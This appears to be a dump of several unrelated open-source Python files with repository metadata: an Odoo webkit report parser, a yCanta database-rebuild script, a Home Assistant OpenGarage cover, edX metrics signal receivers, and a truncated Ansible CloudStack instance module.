htmls = []
if report_xml.report_type != 'webkit':
return super(WebKitParser,self).create_single_pdf(cursor, uid, ids, data, report_xml, context=context)
self.parser_instance = self.parser(cursor,
uid,
self.name2,
context=context)
self.pool = pooler.get_pool(cursor.dbname)
objs = self.getObjects(cursor, uid, ids, context)
self.parser_instance.set_context(objs, data, ids, report_xml.report_type)
template = False
if report_xml.report_file :
path = addons.get_module_resource(*report_xml.report_file.split(os.path.sep))
if os.path.exists(path) :
template = file(path).read()
if not template and report_xml.report_webkit_data :
template = report_xml.report_webkit_data
if not template :
raise except_osv(_('Error!'), _('Webkit report template not found!'))
header = report_xml.webkit_header.html
footer = report_xml.webkit_header.footer_html
if not header and report_xml.header:
raise except_osv(
_('No header defined for this Webkit report!'),
_('Please set a header in company settings.')
)
if not report_xml.header :
header = ''
default_head = addons.get_module_resource('report_webkit', 'default_header.html')
with open(default_head,'r') as f:
header = f.read()
css = report_xml.webkit_header.css
if not css :
css = ''
#default_filters=['unicode', 'entity'] can be used to set global filter
body_mako_tpl = mako_template(template)
helper = WebKitHelper(cursor, uid, report_xml.id, context)
if report_xml.precise_mode:
for obj in objs:
self.parser_instance.localcontext['objects'] = [obj]
try :
html = body_mako_tpl.render(helper=helper,
css=css,
_=self.translate_call,
**self.parser_instance.localcontext)
htmls.append(html)
except Exception:
msg = exceptions.text_error_template().render()
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
else:
try :
html = body_mako_tpl.render(helper=helper,
css=css,
_=self.translate_call,
**self.parser_instance.localcontext)
htmls.append(html)
except Exception:
msg = exceptions.text_error_template().render()
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
head_mako_tpl = mako_template(header)
try :
head = head_mako_tpl.render(helper=helper,
css=css,
_=self.translate_call,
_debug=False,
**self.parser_instance.localcontext)
except Exception:
raise except_osv(_('Webkit render!'),
exceptions.text_error_template().render())
foot = False
if footer :
foot_mako_tpl = mako_template(footer)
try :
foot = foot_mako_tpl.render(helper=helper,
css=css,
_=self.translate_call,
**self.parser_instance.localcontext)
except:
msg = exceptions.text_error_template().render()
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
if report_xml.webkit_debug :
try :
deb = head_mako_tpl.render(helper=helper,
css=css,
_debug=tools.ustr("\n".join(htmls)),
_=self.translate_call,
**self.parser_instance.localcontext)
except Exception:
msg = exceptions.text_error_template().render()
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
return (deb, 'html')
bin = self.get_lib(cursor, uid)
pdf = self.generate_pdf(bin, report_xml, head, foot, htmls)
return (pdf, 'pdf')
def create(self, cursor, uid, ids, data, context=None):
"""We override the create function in order to handle generator
Code taken from report openoffice. Thanks guys :) """
pool = pooler.get_pool(cursor.dbname)
ir_obj = pool.get('ir.actions.report.xml')
report_xml_ids = ir_obj.search(cursor, uid,
[('report_name', '=', self.name[7:])], context=context)
if report_xml_ids:
report_xml = ir_obj.browse(cursor,
uid,
report_xml_ids[0],
context=context)
report_xml.report_rml = None
report_xml.report_rml_content = None
report_xml.report_sxw_content_data = None
report_xml.report_sxw_content = None
report_xml.report_sxw = None
else:
return super(WebKitParser, self).create(cursor, uid, ids, data, context)
if report_xml.report_type != 'webkit' :
return super(WebKitParser, self).create(cursor, uid, ids, data, context)
result = self.create_source_pdf(cursor, uid, ids, data, report_xml, context)
if not result:
return (False,False)
return result
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
yCanta/yCanta
|
regen_db.py
|
1
|
3115
|
#!/usr/bin/env python
from webapp.model import Song, Songbook, hub
try: # try c version for speed then fall back to python
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import xml.parsers.expat
import webapp.c_utilities as c
from posixpath import *
import turbogears
import glob
import sys
import os
import re
if exists('song.db'):
os.system('rm song.db')
print '\nREMOVED EXISTING DATABASE\n'
os.system('tg-admin -c prod.cfg sql create')
if exists(join(dirname(__file__), "setup.py")):
turbogears.update_config(configfile="dev.cfg",
modulename="webapp.config")
# grab all songs and songbooks from directories
songlist = glob.glob('songs/*')
songbooklist = glob.glob('songbooks/*')
# enter songs into database
hub.begin() #open connection to database
print '\n'
for song in songlist:
print 'Song:', song
path = song.replace('\\', '/')
try:
dom = ET.parse(path)
if dom.find('stitle') != None and dom.find('stitle').text != None: #don't die if no title
title = dom.find('stitle').text
else:
title = 'No title'
print 'NO TITLE:', path
if dom.find('author') != None and dom.find('author').text != None: #don't die if no author
author = dom.find('author').text
else:
author = ''
if dom.find('categories') != None and dom.find('categories').text != None: #don't die if no categories
categories = dom.find('categories').text
else:
categories = ''
if dom.find('copyright') != None and dom.find('copyright').text != None: #don't die if no copyright
copyright = dom.find('copyright').text
else:
copyright = ''
#this code is direct copy from db.py song_save
if dom.find('chunk/line') != None: #don't die if no content
content = ''
for line in dom.findall('chunk/line'):
content += re.sub('<c.*?c>', '', ET.tostring(line).replace('<line>',' ').replace('</line>',' '))
else:
content = ''
except xml.parsers.expat.ExpatError:
title = 'No title'
author = ''
categories = ''
print 'MALFORMED:', path
Song(title=c.fix_encoding(title), path=path, author=c.fix_encoding(author),
categories=c.fix_encoding(categories), content=c.fix_encoding(content),
copyright=c.fix_encoding(copyright))
hub.commit() #commit song to database
# enter songbooks into database
for songbook in songbooklist:
if songbook.endswith('.comment') or songbook.endswith('.comment.dat') or songbook.endswith('.comment.dir') or songbook.endswith('.bak'):
continue # .comment files are not songbooks
print 'Songbook:', songbook
path = songbook.replace('\\', '/')
try:
dom = ET.parse(path)
if dom.find('title') != None: #don't die if no title
title = dom.find('title').text
else:
print 'NO TITLE:', path
title = 'No title'
except xml.parsers.expat.ExpatError:
title = 'No title'
print 'MALFORMED:', path
Songbook(title=c.fix_encoding(title), path=path)
hub.commit() #commit songbook to database
hub.end() #end connection to database
|
unlicense
|
Cinntax/home-assistant
|
homeassistant/components/opengarage/cover.py
|
1
|
5524
|
"""Platform for the opengarage.io cover component."""
import logging
import requests
import voluptuous as vol
from homeassistant.components.cover import (
CoverDevice,
DEVICE_CLASS_GARAGE,
PLATFORM_SCHEMA,
SUPPORT_OPEN,
SUPPORT_CLOSE,
)
from homeassistant.const import (
CONF_NAME,
STATE_CLOSED,
STATE_OPEN,
CONF_COVERS,
CONF_HOST,
CONF_PORT,
STATE_CLOSING,
STATE_OPENING,
)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_DISTANCE_SENSOR = "distance_sensor"
ATTR_DOOR_STATE = "door_state"
ATTR_SIGNAL_STRENGTH = "wifi_signal"
CONF_DEVICE_KEY = "device_key"
DEFAULT_NAME = "OpenGarage"
DEFAULT_PORT = 80
STATES_MAP = {0: STATE_CLOSED, 1: STATE_OPEN}
COVER_SCHEMA = vol.Schema(
{
vol.Required(CONF_DEVICE_KEY): cv.string,
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_COVERS): cv.schema_with_slug_keys(COVER_SCHEMA)}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the OpenGarage covers."""
covers = []
devices = config.get(CONF_COVERS)
for device_config in devices.values():
args = {
CONF_NAME: device_config.get(CONF_NAME),
CONF_HOST: device_config.get(CONF_HOST),
CONF_PORT: device_config.get(CONF_PORT),
CONF_DEVICE_KEY: device_config.get(CONF_DEVICE_KEY),
}
covers.append(OpenGarageCover(args))
add_entities(covers, True)
class OpenGarageCover(CoverDevice):
"""Representation of a OpenGarage cover."""
def __init__(self, args):
"""Initialize the cover."""
self.opengarage_url = "http://{}:{}".format(args[CONF_HOST], args[CONF_PORT])
self._name = args[CONF_NAME]
self._device_key = args[CONF_DEVICE_KEY]
self._state = None
self._state_before_move = None
self._device_state_attributes = {}
self._available = True
@property
def name(self):
"""Return the name of the cover."""
return self._name
@property
def available(self):
"""Return True if entity is available."""
return self._available
@property
def device_state_attributes(self):
"""Return the device state attributes."""
return self._device_state_attributes
@property
def is_closed(self):
"""Return if the cover is closed."""
if self._state is None:
return None
return self._state in [STATE_CLOSED, STATE_OPENING]
def close_cover(self, **kwargs):
"""Close the cover."""
if self._state in [STATE_CLOSED, STATE_CLOSING]:
return
self._state_before_move = self._state
self._state = STATE_CLOSING
self._push_button()
def open_cover(self, **kwargs):
"""Open the cover."""
if self._state in [STATE_OPEN, STATE_OPENING]:
return
self._state_before_move = self._state
self._state = STATE_OPENING
self._push_button()
def update(self):
"""Get updated status from API."""
try:
status = requests.get(f"{self.opengarage_url}/jc", timeout=10).json()
except requests.exceptions.RequestException as ex:
_LOGGER.error(
"Unable to connect to OpenGarage device: %(reason)s", dict(reason=ex)
)
self._available = False
return
if self._name is None and status["name"] is not None:
self._name = status["name"]
state = STATES_MAP.get(status.get("door"))
if self._state_before_move is not None:
if self._state_before_move != state:
self._state = state
self._state_before_move = None
else:
self._state = state
_LOGGER.debug("%s status: %s", self._name, self._state)
if status.get("rssi") is not None:
self._device_state_attributes[ATTR_SIGNAL_STRENGTH] = status.get("rssi")
if status.get("dist") is not None:
self._device_state_attributes[ATTR_DISTANCE_SENSOR] = status.get("dist")
if self._state is not None:
self._device_state_attributes[ATTR_DOOR_STATE] = self._state
self._available = True
def _push_button(self):
"""Send commands to API."""
result = -1
try:
result = requests.get(
f"{self.opengarage_url}/cc?dkey={self._device_key}&click=1", timeout=10
).json()["result"]
except requests.exceptions.RequestException as ex:
_LOGGER.error(
"Unable to connect to OpenGarage device: %(reason)s", dict(reason=ex)
)
if result == 1:
return
if result == 2:
_LOGGER.error("Unable to control %s: Device key is incorrect", self._name)
elif result > 2:
_LOGGER.error("Unable to control %s: Error code %s", self._name, result)
self._state = self._state_before_move
self._state_before_move = None
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
return DEVICE_CLASS_GARAGE
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_OPEN | SUPPORT_CLOSE
|
apache-2.0
|
y12uc231/edx-platform
|
common/djangoapps/monitoring/signals.py
|
172
|
4584
|
"""
Add receivers for django signals, and feed data into the monitoring system.
If a model has a class attribute 'METRIC_TAGS' that is a list of strings,
those fields will be retrieved from the model instance, and added as tags to
the recorded metrics.
"""
from django.db.models.signals import post_save, post_delete, m2m_changed, post_init
from django.dispatch import receiver
import dogstats_wrapper as dog_stats_api
def _database_tags(action, sender, kwargs):
"""
Return a tags for the sender and database used in django.db.models signals.
Arguments:
action (str): What action is being performed on the db model.
sender (Model): What model class is the action being performed on.
kwargs (dict): The kwargs passed by the model signal.
"""
tags = _model_tags(kwargs, 'instance')
tags.append(u'action:{}'.format(action))
if 'using' in kwargs:
tags.append(u'database:{}'.format(kwargs['using']))
return tags
def _model_tags(kwargs, key):
"""
Return a list of all tags for all attributes in kwargs[key].MODEL_TAGS,
plus a tag for the model class.
"""
if key not in kwargs:
return []
instance = kwargs[key]
tags = [
u'{}.{}:{}'.format(key, attr, getattr(instance, attr))
for attr in getattr(instance, 'MODEL_TAGS', [])
]
tags.append(u'model_class:{}'.format(instance.__class__.__name__))
return tags
@receiver(post_init, dispatch_uid='edxapp.monitoring.post_init_metrics')
def post_init_metrics(sender, **kwargs):
"""
Record the number of times that django models are instantiated.
Args:
sender (Model): The model class sending the signals.
using (str): The name of the database being used for this initialization (optional).
instance (Model instance): The instance being initialized (optional).
"""
tags = _database_tags('initialized', sender, kwargs)
dog_stats_api.increment('edxapp.db.model', tags=tags)
@receiver(post_save, dispatch_uid='edxapp.monitoring.post_save_metrics')
def post_save_metrics(sender, **kwargs):
"""
Record the number of times that django models are saved (created or updated).
Args:
sender (Model): The model class sending the signals.
using (str): The name of the database being used for this update (optional).
instance (Model instance): The instance being updated (optional).
"""
action = 'created' if kwargs.pop('created', False) else 'updated'
tags = _database_tags(action, sender, kwargs)
dog_stats_api.increment('edxapp.db.model', tags=tags)
@receiver(post_delete, dispatch_uid='edxapp.monitoring.post_delete_metrics')
def post_delete_metrics(sender, **kwargs):
"""
Record the number of times that django models are deleted.
Args:
sender (Model): The model class sending the signals.
using (str): The name of the database being used for this deletion (optional).
instance (Model instance): The instance being deleted (optional).
"""
tags = _database_tags('deleted', sender, kwargs)
dog_stats_api.increment('edxapp.db.model', tags=tags)
@receiver(m2m_changed, dispatch_uid='edxapp.monitoring.m2m_changed_metrics')
def m2m_changed_metrics(sender, **kwargs):
"""
Record the number of times that Many2Many fields are updated. This is separated
from post_save and post_delete, because it's signaled by the database model in
the middle of the Many2Many relationship, rather than either of the models
that are the relationship participants.
Args:
sender (Model): The model class in the middle of the Many2Many relationship.
action (str): The action being taken on this Many2Many relationship.
using (str): The name of the database being used for this deletion (optional).
instance (Model instance): The instance whose many-to-many relation is being modified.
model (Model class): The model of the class being added/removed/cleared from the relation.
"""
if 'action' not in kwargs:
return
action = {
'post_add': 'm2m.added',
'post_remove': 'm2m.removed',
'post_clear': 'm2m.cleared',
}.get(kwargs['action'])
if not action:
return
tags = _database_tags(action, sender, kwargs)
if 'model' in kwargs:
tags.append('target_class:{}'.format(kwargs['model'].__name__))
pk_set = kwargs.get('pk_set', []) or []
dog_stats_api.increment(
'edxapp.db.model',
value=len(pk_set),
tags=tags
)
|
agpl-3.0
|
gundalow/ansible-modules-extras
|
cloud/cloudstack/cs_instance.py
|
10
|
36881
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, René Moser <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: cs_instance
short_description: Manages instances and virtual machines on Apache CloudStack based clouds.
description:
- Deploy, start, update, scale, restart, restore, stop and destroy instances.
version_added: '2.0'
author: "René Moser (@resmo)"
options:
name:
description:
- Host name of the instance. C(name) can only contain ASCII letters.
- Name will be generated (UUID) by CloudStack if not specified and can not be changed afterwards.
- Either C(name) or C(display_name) is required.
required: false
default: null
display_name:
description:
- Custom display name of the instances.
- Display name will be set to C(name) if not specified.
- Either C(name) or C(display_name) is required.
required: false
default: null
group:
description:
- Group in where the new instance should be in.
required: false
default: null
state:
description:
- State of the instance.
required: false
default: 'present'
choices: [ 'deployed', 'started', 'stopped', 'restarted', 'restored', 'destroyed', 'expunged', 'present', 'absent' ]
service_offering:
description:
- Name or id of the service offering of the new instance.
- If not set, first found service offering is used.
required: false
default: null
cpu:
description:
- The number of CPUs to allocate to the instance, used with custom service offerings
required: false
default: null
cpu_speed:
description:
- The clock speed/shares allocated to the instance, used with custom service offerings
required: false
default: null
memory:
description:
- The memory allocated to the instance, used with custom service offerings
required: false
default: null
template:
description:
- Name or id of the template to be used for creating the new instance.
- Required when using C(state=present).
- Mutually exclusive with C(ISO) option.
required: false
default: null
iso:
description:
- Name or id of the ISO to be used for creating the new instance.
- Required when using C(state=present).
- Mutually exclusive with C(template) option.
required: false
default: null
template_filter:
description:
- Name of the filter used to search for the template or iso.
- Used for params C(iso) or C(template) on C(state=present).
required: false
default: 'executable'
choices: [ 'featured', 'self', 'selfexecutable', 'sharedexecutable', 'executable', 'community' ]
aliases: [ 'iso_filter' ]
version_added: '2.1'
hypervisor:
description:
- Name the hypervisor to be used for creating the new instance.
- Relevant when using C(state=present), but only considered if not set on ISO/template.
- If not set or found on ISO/template, first found hypervisor will be used.
required: false
default: null
choices: [ 'KVM', 'VMware', 'BareMetal', 'XenServer', 'LXC', 'HyperV', 'UCS', 'OVM' ]
keyboard:
description:
- Keyboard device type for the instance.
required: false
default: null
choices: [ 'de', 'de-ch', 'es', 'fi', 'fr', 'fr-be', 'fr-ch', 'is', 'it', 'jp', 'nl-be', 'no', 'pt', 'uk', 'us' ]
networks:
description:
- List of networks to use for the new instance.
required: false
default: []
aliases: [ 'network' ]
ip_address:
description:
- IPv4 address for default instance's network during creation.
required: false
default: null
ip6_address:
description:
- IPv6 address for default instance's network.
required: false
default: null
ip_to_networks:
description:
- "List of mappings in the form {'network': NetworkName, 'ip': 1.2.3.4}"
- Mutually exclusive with C(networks) option.
required: false
default: null
aliases: [ 'ip_to_network' ]
disk_offering:
description:
- Name of the disk offering to be used.
required: false
default: null
disk_size:
description:
- Disk size in GByte required if deploying instance from ISO.
required: false
default: null
root_disk_size:
description:
- Root disk size in GByte required if deploying instance with KVM hypervisor and want resize the root disk size at startup (need CloudStack >= 4.4, cloud-initramfs-growroot installed and enabled in the template)
required: false
default: null
security_groups:
description:
- List of security groups the instance to be applied to.
required: false
default: null
aliases: [ 'security_group' ]
domain:
description:
- Domain the instance is related to.
required: false
default: null
account:
description:
- Account the instance is related to.
required: false
default: null
project:
description:
- Name of the project the instance to be deployed in.
required: false
default: null
zone:
description:
- Name of the zone in which the instance shoud be deployed.
- If not set, default zone is used.
required: false
default: null
ssh_key:
description:
- Name of the SSH key to be deployed on the new instance.
required: false
default: null
affinity_groups:
description:
- Affinity groups names to be applied to the new instance.
required: false
default: []
aliases: [ 'affinity_group' ]
user_data:
description:
- Optional data (ASCII) that can be sent to the instance upon a successful deployment.
- The data will be automatically base64 encoded.
- Consider switching to HTTP_POST by using C(CLOUDSTACK_METHOD=post) to increase the HTTP_GET size limit of 2KB to 32 KB.
required: false
default: null
vpc:
description:
- Name of the VPC.
required: false
default: null
version_added: "2.3"
force:
description:
- Force stop/start the instance if required to apply changes, otherwise a running instance will not be changed.
required: false
default: false
tags:
description:
- List of tags. Tags are a list of dictionaries having keys C(key) and C(value).
- "If you want to delete all tags, set a empty list e.g. C(tags: [])."
required: false
default: null
aliases: [ 'tag' ]
poll_async:
description:
- Poll async jobs until job has finished.
required: false
default: true
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
# Create a instance from an ISO
# NOTE: Names of offerings and ISOs depending on the CloudStack configuration.
- cs_instance:
name: web-vm-1
iso: Linux Debian 7 64-bit
hypervisor: VMware
project: Integration
zone: ch-zrh-ix-01
service_offering: 1cpu_1gb
disk_offering: PerfPlus Storage
disk_size: 20
networks:
- Server Integration
- Sync Integration
- Storage Integration
delegate_to: localhost
# For changing a running instance, use the 'force' parameter
- cs_instance:
name: web-vm-1
display_name: web-vm-01.example.com
iso: Linux Debian 7 64-bit
service_offering: 2cpu_2gb
force: yes
delegate_to: localhost
# Create or update a instance on Exoscale's public cloud using display_name.
# Note: user_data can be used to kickstart the instance using cloud-init yaml config.
- cs_instance:
display_name: web-vm-1
template: Linux Debian 7 64-bit
service_offering: Tiny
ssh_key: [email protected]
tags:
- key: admin
value: john
- key: foo
value: bar
user_data: |
#cloud-config
packages:
- nginx
delegate_to: localhost
# Create an instance with multiple interfaces specifying the IP addresses
- cs_instance:
name: web-vm-1
template: Linux Debian 7 64-bit
service_offering: Tiny
ip_to_networks:
- network: NetworkA
ip: 10.1.1.1
- network: NetworkB
ip: 192.0.2.1
delegate_to: localhost
# Ensure an instance is stopped
- cs_instance:
name: web-vm-1
state: stopped
delegate_to: localhost
# Ensure an instance is running
- cs_instance:
name: web-vm-1
state: started
delegate_to: localhost
# Remove an instance
- cs_instance:
name: web-vm-1
state: absent
delegate_to: localhost
'''
RETURN = '''
---
id:
description: UUID of the instance.
returned: success
type: string
sample: 04589590-ac63-4ffc-93f5-b698b8ac38b6
name:
description: Name of the instance.
returned: success
type: string
sample: web-01
display_name:
description: Display name of the instance.
returned: success
type: string
sample: web-01
group:
description: Group name of the instance is related.
returned: success
type: string
sample: web
created:
description: Date of the instance was created.
returned: success
type: string
sample: 2014-12-01T14:57:57+0100
password_enabled:
description: True if password setting is enabled.
returned: success
type: boolean
sample: true
password:
description: The password of the instance if exists.
returned: success
type: string
sample: Ge2oe7Do
ssh_key:
description: Name of SSH key deployed to instance.
returned: success
type: string
sample: key@work
domain:
description: Domain the instance is related to.
returned: success
type: string
sample: example domain
account:
description: Account the instance is related to.
returned: success
type: string
sample: example account
project:
description: Name of project the instance is related to.
returned: success
type: string
sample: Production
default_ip:
description: Default IP address of the instance.
returned: success
type: string
sample: 10.23.37.42
public_ip:
description: Public IP address with instance via static NAT rule.
returned: success
type: string
sample: 1.2.3.4
iso:
description: Name of ISO the instance was deployed with.
returned: success
type: string
sample: Debian-8-64bit
template:
description: Name of template the instance was deployed with.
returned: success
type: string
sample: Debian-8-64bit
service_offering:
description: Name of the service offering the instance has.
returned: success
type: string
sample: 2cpu_2gb
zone:
description: Name of zone the instance is in.
returned: success
type: string
sample: ch-gva-2
state:
description: State of the instance.
returned: success
type: string
sample: Running
security_groups:
description: Security groups the instance is in.
returned: success
type: list
sample: '[ "default" ]'
affinity_groups:
description: Affinity groups the instance is in.
returned: success
type: list
sample: '[ "webservers" ]'
tags:
description: List of resource tags associated with the instance.
returned: success
type: dict
sample: '[ { "key": "foo", "value": "bar" } ]'
hypervisor:
description: Hypervisor related to this instance.
returned: success
type: string
sample: KVM
instance_name:
description: Internal name of the instance (ROOT admin only).
returned: success
type: string
sample: i-44-3992-VM
'''
import base64
# import cloudstack common
from ansible.module_utils.cloudstack import *
class AnsibleCloudStackInstance(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackInstance, self).__init__(module)
self.returns = {
'group': 'group',
'hypervisor': 'hypervisor',
'instancename': 'instance_name',
'publicip': 'public_ip',
'passwordenabled': 'password_enabled',
'password': 'password',
'serviceofferingname': 'service_offering',
'isoname': 'iso',
'templatename': 'template',
'keypair': 'ssh_key',
}
self.instance = None
self.template = None
self.iso = None
def get_service_offering_id(self):
service_offering = self.module.params.get('service_offering')
service_offerings = self.cs.listServiceOfferings()
if service_offerings:
if not service_offering:
return service_offerings['serviceoffering'][0]['id']
for s in service_offerings['serviceoffering']:
if service_offering in [ s['name'], s['id'] ]:
return s['id']
self.module.fail_json(msg="Service offering '%s' not found" % service_offering)
def get_template_or_iso(self, key=None):
template = self.module.params.get('template')
iso = self.module.params.get('iso')
if not template and not iso:
return None
args = {}
args['account'] = self.get_account(key='name')
args['domainid'] = self.get_domain(key='id')
args['projectid'] = self.get_project(key='id')
args['zoneid'] = self.get_zone(key='id')
args['isrecursive'] = True
if template:
if self.template:
return self._get_by_key(key, self.template)
args['templatefilter'] = self.module.params.get('template_filter')
templates = self.cs.listTemplates(**args)
if templates:
for t in templates['template']:
if template in [ t['displaytext'], t['name'], t['id'] ]:
self.template = t
return self._get_by_key(key, self.template)
self.module.fail_json(msg="Template '%s' not found" % template)
elif iso:
if self.iso:
return self._get_by_key(key, self.iso)
args['isofilter'] = self.module.params.get('template_filter')
isos = self.cs.listIsos(**args)
if isos:
for i in isos['iso']:
if iso in [ i['displaytext'], i['name'], i['id'] ]:
self.iso = i
return self._get_by_key(key, self.iso)
self.module.fail_json(msg="ISO '%s' not found" % iso)
def get_disk_offering_id(self):
disk_offering = self.module.params.get('disk_offering')
if not disk_offering:
return None
disk_offerings = self.cs.listDiskOfferings()
if disk_offerings:
for d in disk_offerings['diskoffering']:
if disk_offering in [ d['displaytext'], d['name'], d['id'] ]:
return d['id']
self.module.fail_json(msg="Disk offering '%s' not found" % disk_offering)
def get_instance(self):
instance = self.instance
if not instance:
instance_name = self.get_or_fallback('name', 'display_name')
vpc_id = self.get_vpc(key='id')
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'vpcid': vpc_id,
}
# Do not pass zoneid, as the instance name must be unique across zones.
instances = self.cs.listVirtualMachines(**args)
if instances:
for v in instances['virtualmachine']:
# Due the limitation of the API, there is no easy way (yet) to get only those VMs
# not belonging to a VPC.
if not vpc_id and self.is_vm_in_vpc(vm=v):
continue
if instance_name.lower() in [ v['name'].lower(), v['displayname'].lower(), v['id'] ]:
self.instance = v
break
return self.instance
def get_iptonetwork_mappings(self):
network_mappings = self.module.params.get('ip_to_networks')
if network_mappings is None:
return
if network_mappings and self.module.params.get('networks'):
self.module.fail_json(msg="networks and ip_to_networks are mutually exclusive.")
network_names = [n['network'] for n in network_mappings]
ids = self.get_network_ids(network_names)
res = []
for i, data in enumerate(network_mappings):
res.append({'networkid': ids[i], 'ip': data['ip']})
return res
def security_groups_has_changed(self):
security_groups = self.module.params.get('security_groups')
if security_groups is None:
return False
security_groups = [s.lower() for s in security_groups]
instance_security_groups = self.instance.get('securitygroup',[])
instance_security_group_names = []
for instance_security_group in instance_security_groups:
if instance_security_group['name'].lower() not in security_groups:
return True
else:
instance_security_group_names.append(instance_security_group['name'].lower())
for security_group in security_groups:
if security_group not in instance_security_group_names:
return True
return False
def get_network_ids(self, network_names=None):
if network_names is None:
network_names = self.module.params.get('networks')
if not network_names:
return None
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'zoneid': self.get_zone(key='id'),
'vpcid': self.get_vpc(key='id'),
}
networks = self.cs.listNetworks(**args)
if not networks:
self.module.fail_json(msg="No networks available")
network_ids = []
network_displaytexts = []
for network_name in network_names:
for n in networks['network']:
if network_name in [ n['displaytext'], n['name'], n['id'] ]:
network_ids.append(n['id'])
network_displaytexts.append(n['name'])
break
if len(network_ids) != len(network_names):
self.module.fail_json(msg="Could not find all networks, networks list found: %s" % network_displaytexts)
return network_ids
def present_instance(self, start_vm=True):
instance = self.get_instance()
if not instance:
instance = self.deploy_instance(start_vm=start_vm)
else:
instance = self.recover_instance(instance=instance)
instance = self.update_instance(instance=instance, start_vm=start_vm)
# In check mode, we do not necessarely have an instance
if instance:
instance = self.ensure_tags(resource=instance, resource_type='UserVm')
# refresh instance data
self.instance = instance
return instance
def get_user_data(self):
user_data = self.module.params.get('user_data')
if user_data is not None:
user_data = base64.b64encode(str(user_data))
return user_data
def get_details(self):
res = None
cpu = self.module.params.get('cpu')
cpu_speed = self.module.params.get('cpu_speed')
memory = self.module.params.get('memory')
if all([cpu, cpu_speed, memory]):
res = [{
'cpuNumber': cpu,
'cpuSpeed': cpu_speed,
'memory': memory,
}]
return res
def deploy_instance(self, start_vm=True):
self.result['changed'] = True
networkids = self.get_network_ids()
if networkids is not None:
networkids = ','.join(networkids)
args = {}
args['templateid'] = self.get_template_or_iso(key='id')
if not args['templateid']:
self.module.fail_json(msg="Template or ISO is required.")
args['zoneid'] = self.get_zone(key='id')
args['serviceofferingid'] = self.get_service_offering_id()
args['account'] = self.get_account(key='name')
args['domainid'] = self.get_domain(key='id')
args['projectid'] = self.get_project(key='id')
args['diskofferingid'] = self.get_disk_offering_id()
args['networkids'] = networkids
args['iptonetworklist'] = self.get_iptonetwork_mappings()
args['userdata'] = self.get_user_data()
args['keyboard'] = self.module.params.get('keyboard')
args['ipaddress'] = self.module.params.get('ip_address')
args['ip6address'] = self.module.params.get('ip6_address')
args['name'] = self.module.params.get('name')
args['displayname'] = self.get_or_fallback('display_name', 'name')
args['group'] = self.module.params.get('group')
args['keypair'] = self.module.params.get('ssh_key')
args['size'] = self.module.params.get('disk_size')
args['startvm'] = start_vm
args['rootdisksize'] = self.module.params.get('root_disk_size')
args['affinitygroupnames'] = ','.join(self.module.params.get('affinity_groups'))
args['details'] = self.get_details()
security_groups = self.module.params.get('security_groups')
if security_groups is not None:
args['securitygroupnames'] = ','.join(security_groups)
template_iso = self.get_template_or_iso()
if 'hypervisor' not in template_iso:
args['hypervisor'] = self.get_hypervisor()
instance = None
if not self.module.check_mode:
instance = self.cs.deployVirtualMachine(**args)
if 'errortext' in instance:
self.module.fail_json(msg="Failed: '%s'" % instance['errortext'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
return instance
def update_instance(self, instance, start_vm=True):
# Service offering data
args_service_offering = {}
args_service_offering['id'] = instance['id']
if self.module.params.get('service_offering'):
args_service_offering['serviceofferingid'] = self.get_service_offering_id()
service_offering_changed = self.has_changed(args_service_offering, instance)
# Instance data
args_instance_update = {}
args_instance_update['id'] = instance['id']
args_instance_update['userdata'] = self.get_user_data()
args_instance_update['ostypeid'] = self.get_os_type(key='id')
if self.module.params.get('group'):
args_instance_update['group'] = self.module.params.get('group')
if self.module.params.get('display_name'):
args_instance_update['displayname'] = self.module.params.get('display_name')
instance_changed = self.has_changed(args_instance_update, instance)
# SSH key data
args_ssh_key = {}
args_ssh_key['id'] = instance['id']
args_ssh_key['projectid'] = self.get_project(key='id')
if self.module.params.get('ssh_key'):
args_ssh_key['keypair'] = self.module.params.get('ssh_key')
ssh_key_changed = self.has_changed(args_ssh_key, instance)
security_groups_changed = self.security_groups_has_changed()
changed = [
service_offering_changed,
instance_changed,
security_groups_changed,
ssh_key_changed,
]
if True in changed:
force = self.module.params.get('force')
instance_state = instance['state'].lower()
if instance_state == 'stopped' or force:
self.result['changed'] = True
if not self.module.check_mode:
# Ensure VM has stopped
instance = self.stop_instance()
instance = self.poll_job(instance, 'virtualmachine')
self.instance = instance
# Change service offering
if service_offering_changed:
res = self.cs.changeServiceForVirtualMachine(**args_service_offering)
if 'errortext' in res:
self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
instance = res['virtualmachine']
self.instance = instance
# Update VM
if instance_changed or security_groups_changed:
if security_groups_changed:
args_instance_update['securitygroupnames'] = ','.join(self.module.params.get('security_groups'))
res = self.cs.updateVirtualMachine(**args_instance_update)
if 'errortext' in res:
